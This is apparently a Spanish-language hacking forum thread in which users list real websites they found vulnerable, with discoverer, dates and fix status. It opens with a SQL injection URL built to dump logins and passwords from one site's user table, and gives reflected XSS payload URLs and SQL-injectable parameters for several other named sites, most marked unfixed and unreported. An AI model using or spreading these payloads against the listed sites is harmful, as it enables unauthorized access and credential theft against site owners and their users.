http://www.elpais.cr/galerias.php?id=-1+union+select+1,group_concat%28login,0x3a,password%29+from+406060_elpais.usuarios--
Sitio web: http://rebelion.org
Descubridor: daryo
Fecha de descubrimiento: 12 mayo 2012
Fecha de notificación: xxxxx
Fecha de publicación: xxxx
Arreglado : No
Información adicional:
Citar
XSS
http://rebelion.org/mostrar.php?id=%3Cscript%3Ealert%28/a/%29%3C/script%3E&submit=Buscar&inicio=1&tipo=3
PD:reviviendo el post XD
Sitio web: http://www.szkolamarzen.pl
Descubridor: daryo
Fecha de descubrimiento: 20 mayo 2012
Fecha de notificación: xxxxx
Fecha de publicación: xxxx
Arreglado : No
Información adicional:
sqli
http://www.szkolamarzen.pl/gim/newsone.php?id=
Sitio web: http://www.worstpreviews.com
Descubridor: daryo
Fecha de descubrimiento: la verdad ni recuerdo
Fecha de notificación: xxxxx
Fecha de publicación: xxxx
Arreglado : No
Información adicional:
sqli
http://www.worstpreviews.com/review.php?id=600
Insertar Cita
Sitio web: http://www.eventdirect.ca
Descubridor: seguro alguien antes que yo :P
Fecha de descubrimiento: la verdad ni recuerdo
Fecha de notificación: xxxxx
Fecha de publicación: xxxx
Arreglado : No
Información adicional:
Código:
sqli
http://www.eventdirect.ca/game.php?ID=62
Nunca he visto esto. Muy interesante.
(http://www.imagelink.info/files/img/user_uploads/displayimage.php?id=lvw6vj5n7c44652817.gif)
bien hay
Sitio web:http://www.espanol.manutd.com/
Descubridor:The BlacK DiamOnD
URL del aviso: --
Fecha de descubrimiento: 2013
Fecha de notificación:24/11/13
Fecha de publicación: --
Arreglado: Si
Vulnerabilidad: XSS
Información adicional:Aunque Esta vulnerabilidad haya sido supuesta mente arreglada,aun sigue existiendo solo que incluyendo código HTML en vez de javascript.
<script>alert("XSS");</script>
& <h1>xss</h1>
Sitio web:http://blog.com.es/
Descubridor:The Black DiamOnD
URL del aviso:http://bugs.blog.co.uk/2014/05/04/html-xss-bug-18373598/
Fecha de descubrimiento: 04/05/2014
Fecha de notificación:04/05/2014
Fecha de publicación:04/05/2014
Arreglado: --
Vulnerabilidad: XSS reflejado
Informacion adicional:Blog Personal
http://support.blog.co.uk/search/%253Ch1%253EHOLA%2BMUNDO%253C%252Fh1%253E/AND/
[youtube=640,360]C2VmExPbU5A[/youtube]
PETROLERA MAS POPULAR EN PERU
BY Security : Peruano y Muy PICHULON ;D
Cita de: Ceh en 12 Junio 2014, 08:30 AM
[youtube=640,360]C2VmExPbU5A[/youtube]
PETROLERA MAS POPULAR EN PERU
BY Security : Peruano y Muy PICHULON ;D
esto se puede tomar como una vulnerabilidad xss? no está haciendo nada, solo cometieron el error de no filtrar la búsqueda, pero no es como si pudieran hacer algo real con eso, ya que no es permanente
Cita de: engel lex en 12 Junio 2014, 08:42 AM
esto se puede tomar como una vulnerabilidad xss? no está haciendo nada, solo cometieron el error de no filtrar la búsqueda, pero no es como si pudieran hacer algo real con eso, ya que no es permanente
Es un XSS Reflejado. Requiere de ingenieria social para tomar provecho de esta falla.
@engel lex, recuendo aquellos tiempos que me dedicaba a buscar vulnerabilidades por todos lados, y recuerdo más aún una frase que lei que dice: "Una vulnerabilidad es tan limitada como tu quieras que sea", y un XSS llega hasta donde tu la quieras llevar.
Citar"Una vulnerabilidad es tan limitada como tu quieras que sea"
si no me equivoco esa frase es de xc3ll/vengador de las sombras :silbar:
Sitio web: http://www.elhacker.net/
Descubridor: arthusu
URL del aviso: http://foro.elhacker.net/
Fecha de descubrimiento: 08/06/2014
Fecha de notificación: 10/06/2014
Fecha de publicación: 10/06/2014
Arreglado: --
Vulnerabilidad: XSS reflejado
Informacion adicional: Blog Personal
http://www.elhacker.net/geolocalizacion.html?host=google.com%22%20autofocus%20onfocus=%22alert%28%27arthusu%20was%20here%27%29%20/%3E
http://www.elhacker.net/whois.html?domain=187.233.84.51%22%20autofocus%20onfocus=%22alert%28%27arthusu%20was%20here%27%29
jaja buena esa arthusu =)
Saludos
BROTHERS hermanos del UNDERGROUND como pueden ver esa web ya no tiene el xss reflejado ahora lo saco con la ayuda de mi addon de firerox ....... bueno y como que el tiro se hace mas dificil !
pero en el video hay scripts para juegar un buen rato :) saludos
ACTUAL ------- ya no reflejado
(http://fotos.subefotos.com/dfc2e6da5af7c0f77f1861ed2e56efd1o.jpg)
;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-)
Sitio web: http://www.aeroescuela.com.ve
Descubridor: LaraAnons
URL del aviso: http://www.aeroescuela.com.ve/correos.php
Fecha de descubrimiento: 11/09/2015
Fecha de notificación: 11/09/2015
Fecha de publicación: 11/09/2015
Arreglado: No
Información adicional: Se informo al administrador a través de la sección contacto de su pagina web
http://www.aeroescuela.com.ve/librodevisitas.php